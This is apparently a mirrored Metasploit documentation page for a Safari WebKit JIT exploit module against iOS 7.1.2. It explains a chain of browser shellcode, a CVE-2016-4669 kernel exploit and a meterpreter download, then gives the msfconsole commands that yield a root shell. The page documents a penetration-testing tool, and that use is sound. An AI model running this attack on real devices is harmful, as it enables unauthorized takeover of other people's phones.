CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/apple_ios/browser/safari_jit.md
Views: 1904
Vulnerable Application
This module exploits a JIT optimization bug in Safari Webkit. This allows us to write shellcode to an RWX memory section in JavaScriptCore and execute it. The shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel rw, obtains root and disables code signing. Finally we download and execute the meterpreter payload.
This module has been tested against iOS 7.1.2 on an iPhone 4.
Verification Steps
Start msfconsole
Do:
use exploit/apple_ios/browser/safari_jit
Do:
set lhost [ip]
Do:
set srvhost [ip]
Do:
run
Browse to the website with a vulnerable device
You should get a root shell.
Options
DEBUG_EXPLOIT
Show debug information during exploitation. This will add entries to the iPhone syslog related to exploitation and loading of the payload. Defaults to false